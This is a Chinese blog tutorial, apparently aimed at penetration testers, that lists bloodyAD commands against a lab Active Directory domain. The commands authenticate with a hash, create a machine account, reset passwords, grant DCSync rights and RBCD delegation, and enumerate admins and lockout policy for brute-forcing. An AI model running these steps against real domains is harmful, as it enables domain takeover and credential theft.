首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >使用bloodyAD对域属性进行查询与修改

使用bloodyAD对域属性进行查询与修改

作者头像
谢公子
发布2022-11-22 11:00:17
发布2022-11-22 11:00:17
2.2K0
举报
文章被收录于专栏:谢公子学安全谢公子学安全

对域属性进行查询与修改

使用bloody AD

项目地址:

https://github.com/CravateRouge/bloodyAD

该工具有如下一些功能:

- delObject :删除对象

- addObjectToGroup

- addForeignObjectToGroup

- delObjectFromGroup

- setShadowCredentials

- setGenericAll

- setOwner

- setRbcd

- setDCSync

- setUserAccountControl

1

认证

使用-u参数指定用户,-p参数指定明文密码或Hash。

1

#使用test用户,密码为P@ss1234

-u test -p P@ss1234

#使用win7机器账号和Hash认证

-u win7\$ -p aad3b435b51404ee

aad3b435b51404ee:53ebb01b78

a294aec70afe9a068be55d

2

新建机器用户

使用普通域用户即可创建机器用户machine$,密码为root。

1

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 addComputer machine 'root'

3

修改对象属性

执行如下命令修改指定对象的dNSHostName属性为DC01.xie.com。

1

python3 bloodyAD.py -d xie.com -u

test -p P@ss1234 --host 10.211.55.4 setAttribute 'CN=machine3,CN=Computers,

DC=xie,DC=com' dNSHostName

'["DC01.xie.com"]'

4

修改用户的密码

修改用户hack的密码为P@ssword1234。

1

python3 bloodyAD.py -d xie.com -u administrator -p P@ssword1234 --host 10.211.55.4 changePassword hack 'P@ssword1234'

5

添加/移除DCSync

1

#给域用户hack添加DCSync

python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p P@ssword1234 --host 10.211.55.4 setDCSync hack

#移除域用户hack的DCSync

python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p P@ssword1234 --host 10.211.55.4 setDCSync hack False

6

添加/移除RBCD

1

#添加机器账号machine对机器win10的RBCD

python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p P@ssword1234 --host 10.211.55.4 setRbcd machine win10$

#移除机器账号machine对机器win10的RBCD

python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p P@ssword1234 --host 10.211.55.4 setRbcd machine win10$ False

7

查询对象

查询域内所有用户

1

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getChildObjects 'CN=Users,DC=xie,DC=com' user

查询域内所有机器

2

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getChildObjects 'CN=Computers,DC=xie,DC=com' user

查询域管/企业管理员

3

#查询域管

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'CN=Domain Admins,CN=Users,DC=xie,DC=com' member

#查询企业管理员

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'CN=Enterprise Admins,CN=Users,DC=xie,DC=com' member

查询域的所有Container容器

4

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getChildObjects 'DC=xie,DC=com' container

查询指定对象属性

5

#查询指定对象所有属性

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'CN=machine4,CN=Computers,DC=xie,DC=com'

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes CN=machine4

#查询指定对象指定servicePrincipalName属性

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'CN=machine4,CN=Computers,DC=xie,DC=com' servicePrincipalName

查询域的MAQ属性

6

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' ms-DS-MachineAccountQuota

查询域的密码锁定策略

如下图,目标域的密码锁定策略是5,当错误大于5次时,用户被锁定。当该值为0时,说明没密码锁定策略,可以进行爆破。

7

python3 bloodyAD.py -d xie.com -u hack -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' LockoutThreshold

查询域的密码锁定时间

8

python3 bloodyAD.py -d xie.com -u hack -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' lockoutDuration

查询域的密码长度最小值

9

python3 bloodyAD.py -d xie.com -u hack -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' minPwdLength

查询域功能级别

10

python3 bloodyAD.py -d xie.com -u hack -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' msDS-Behavior-Version

END

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-09-08,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 谢公子学安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档